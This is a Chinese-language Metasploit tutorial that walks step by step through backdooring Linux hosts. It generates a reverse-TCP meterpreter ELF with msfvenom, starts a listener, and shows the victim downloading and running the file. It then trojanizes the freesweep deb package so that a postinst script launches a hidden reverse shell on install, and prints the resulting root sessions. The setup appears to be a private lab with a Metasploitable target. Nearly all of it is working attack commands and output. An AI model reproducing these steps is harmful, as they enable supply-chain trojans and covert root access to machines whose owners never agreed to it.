Metasploit后门攻击实例（五）

1.1 后门攻击实例

1.1.1 制作Linux后门获取shell

1.1.1.1 制作Linux木马

# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /var/www/html/backdoor

1.1.1.2 kali启动监听程序

msf6 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

1.1.1.3 Linux（centos）执行木马

[root@test ~]# wget http://192.168.10.180/backdoor
[root@test ~]# chmod +x backdoor
[root@test ~]# nohup ./backdoor &

1.1.1.4 后门连接成功后执行攻击指令

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.10.80
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > ls
Listing: /root
==============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100600/rw-------  13893  fil   2022-06-01 16:01:33 +0800  .bash_history
100644/rw-r--r--  18     fil   2013-12-29 10:26:31 +0800  .bash_logout
100644/rw-r--r--  176    fil   2013-12-29 10:26:31 +0800  .bash_profile
100644/rw-r--r--  176    fil   2013-12-29 10:26:31 +0800  .bashrc
100644/rw-r--r--  100    fil   2013-12-29 10:26:31 +0800  .cshrc
040755/rwxr-xr-x  37     dir   2021-12-14 10:44:29 +0800  .java
100600/rw-------  349    fil   2021-12-17 14:11:10 +0800  .mysql_history
040740/rwxr-----  19     dir   2021-11-16 10:41:42 +0800  .pki
040700/rwx------  25     dir   2021-12-14 13:23:17 +0800  .ssh
100644/rw-r--r--  129    fil   2013-12-29 10:26:31 +0800  .tcshrc
100600/rw-------  6982   fil   2022-05-12 10:36:28 +0800  .viminfo
100600/rw-------  1434   fil   2021-05-21 14:07:28 +0800  anaconda-ks.cfg
100755/rwxr-xr-x  295    fil   2022-06-07 17:05:55 +0800  backdoor
100644/rw-r--r--  27647  fil   2022-06-01 10:47:00 +0800  dnmap-0.6.zip
040755/rwxr-xr-x  199    dir   2022-06-01 15:02:43 +0800  dnmap-master
100644/rw-r--r--  23761  fil   2022-01-13 13:28:05 +0800  history.log

1.1.2 给deb软件注入后门进行攻击

1.1.2.1 制作恶意deb软件包

• 下载解压deb软件

# apt install freesweep --download-only
# mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ./
# dpkg -x freesweep_1.0.2-1_amd64.deb free

• 生成后门文件

# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_sources

• 创建打包deb的配置文件

# mkdir -p /root/free/DEBIAN
# cd /root/free/DEBIAN

# cat >> /root/free/DEBIAN/control <<'EOF'
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text- based terminals currently in use.
EOF

# cat >> /root/free/DEBIAN/postinst <<'EOF'
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF

# chmod 755 /root/free/DEBIAN/postinst

• 重新打包deb文件

# dpkg-deb --build /root/free/
# ll -h free.deb
-rw-r--r-- 1 root root 55K Jun  8 08:54 free.deb
# 若报错：dpkg-deb: file `free.deb' contains ununderstood data member control.tar.xz  , giving up
# 则使用此命令打包：dpkg-deb -Z gzip --build ./free free.deb
# mv free.deb /var/www/html
# systemctl start apache2.service

1.1.2.2 开启msf监听

# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit –j

1.1.2.3 客户端安装deb

msfadmin@metasploitable:~$ wget http://192.168.10.180/free.deb
msfadmin@metasploitable:~$ sudo dpkg -i free.deb

1.1.2.4 查看连接情况并获取服务器信息

msf6 exploit(multi/handler) > sessions

msf6 exploit(multi/handler) > sessions -i 5
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/
background

Background session 5? [y/N]  y